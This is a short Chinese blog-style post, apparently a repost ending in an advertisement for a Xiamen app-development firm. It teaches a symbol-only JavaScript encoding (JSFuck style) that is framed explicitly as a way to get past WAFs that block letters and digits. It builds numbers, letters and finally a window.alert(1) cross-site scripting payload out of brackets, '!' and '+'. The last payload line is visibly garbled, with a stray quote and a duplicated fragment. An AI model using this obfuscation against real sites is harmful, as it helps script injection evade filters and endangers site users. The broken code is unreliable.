js 是一门强大的语言。对黑客来说,这是绕过 WAF 的利器,比如当字母和数字都无被 WAF 屏蔽的时候,你可以这样玩:
1 = !+[] = ++[[]][+[]]
2 = !+[]+!+[] = ++[++[[]][+[]]][+[]]
3 = !+[]+!+[]+!+[] = ++[++[++[[]][+[]]][+[]]][+[]]
而
a 的获取方式 false[1] 或者是 NaN[1]
false = ([![]]+[])
// 空的 array, NOT 一下,加上中括号后再通过+[] 转化成 string
1 = ++[[]][+[]]
//前面解释过了,或者用!+[] 也可以。
于是 a 可以用这个表达:([![]]+[]) [++[[]][+[]]]
同理 l 的是 false[2], 等于 ([![]]+[])[++[++[[]][+ []]][+[]]]
e 是 false[4], r 和 t 通过 true 来获得,而 true 就是 false 去掉 NOT 符号的结果
最后 alert 也就是这个:
(+[][+[]]+[])[++[[]][+[]]]+([![]]+ [])[++[++[[]][+[]]][+[]]]+([!![]]+ [])[++[++[++[[]][+[]]][+[]]][+[]]]+ ([!![]]+[])[++[[]][+[]]]+([!![]]+ [])[+[]]
还有一些比较复杂的字母需要绕一下,比如说 window 对象 的构造:
(1,[].sort)() = window
sort 的 s 通过 false, r t 通过 true, o 通过 [object Object]
于是 window.alert(1) 就是如下代码:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]](++[[]][+[]] "],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]")
如果你想开发小程序或者了解更多关于小程序的内容,欢迎关注厦门在乎科技-专注厦门小程序开发公司、app开发、网站开发、H5小游戏开发